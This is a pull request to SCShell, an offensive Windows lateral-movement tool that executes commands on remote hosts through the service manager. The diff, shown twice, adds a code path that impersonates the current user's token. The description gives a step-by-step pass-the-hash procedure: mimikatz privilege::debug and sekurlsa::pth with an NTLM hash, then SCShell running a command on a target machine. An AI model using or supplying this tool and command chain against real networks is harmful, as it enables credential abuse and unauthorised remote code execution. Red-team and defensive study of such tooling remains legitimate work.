### PR TITLE
Added support for authenticating with current user context

### DIFF
--- a/SCShell.c
+++ b/SCShell.c
@@ -43,24 +43,25 @@ int main(int argc, char **argv) {
             ExitProcess(0);
         }
     }
-	else {
-		HANDLE hToken = NULL;
-		if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)){
-			printf("OpenProcessToken() - Getting the handle to access token failed, error %u\n", GetLastError());
-		}
-		else{
-			printf("OpenProcessToken() - Got the handle to access token!\n");
-		}
-
+    else {
+        HANDLE hToken = NULL;
+        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)){
+            printf("OpenProcessToken() - Getting the handle to access token failed, error %u\n", GetLastError());
+        }
+        else{
+            printf("OpenProcessToken() - Got the handle to access token!\n");
+        }
+	    
 		// Lets the calling process impersonate the security context of a logged-on user.
-		if (ImpersonateLoggedOnUser(hToken)) {
-			printf("ImpersonateLoggedOnUser() is OK.\n");
-		}
-		else{
-			printf("ImpersonateLoggedOnUser() failed, error %u.\n", GetLastError());
-			exit(-1);
-		}
-	}
+        if (ImpersonateLoggedOnUser(hToken)) {
+            printf("ImpersonateLoggedOnUser() is OK.\n");
+        }
+        else{
+            printf("ImpersonateLoggedOnUser() failed, error %u.\n", GetLastError());
+            exit(-1);
+        }
+    }
+
     SC_HANDLE schManager = OpenSCManagerA(targetHost, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
     if(schManager == NULL) {
         printf("OpenSCManagerA failed %ld\n", GetLastError());

--- a/SCShell.c
+++ b/SCShell.c
@@ -43,7 +43,24 @@ int main(int argc, char **argv) {
             ExitProcess(0);
         }
     }
+	else {
+		HANDLE hToken = NULL;
+		if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)){
+			printf("OpenProcessToken() - Getting the handle to access token failed, error %u\n", GetLastError());
+		}
+		else{
+			printf("OpenProcessToken() - Got the handle to access token!\n");
+		}
 
+		// Lets the calling process impersonate the security context of a logged-on user.
+		if (ImpersonateLoggedOnUser(hToken)) {
+			printf("ImpersonateLoggedOnUser() is OK.\n");
+		}
+		else{
+			printf("ImpersonateLoggedOnUser() failed, error %u.\n", GetLastError());
+			exit(-1);
+		}
+	}
     SC_HANDLE schManager = OpenSCManagerA(targetHost, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
     if(schManager == NULL) {
         printf("OpenSCManagerA failed %ld\n", GetLastError());


### PR DESCRIPTION
By using the current user context, you can use mimikatz for Pass the Hash!
1. Open mimikatz (with administrative privileges):
    - privilege::debug
    - sekurlsa::pth /user:user /domain:domain /ntlm:ntlm-hash /run:cmd.exe
2. In the cmd.exe that opened:
    - SCShell.exe target service "C:\windows\system32\cmd.exe /c echo hello > C:\a.txt"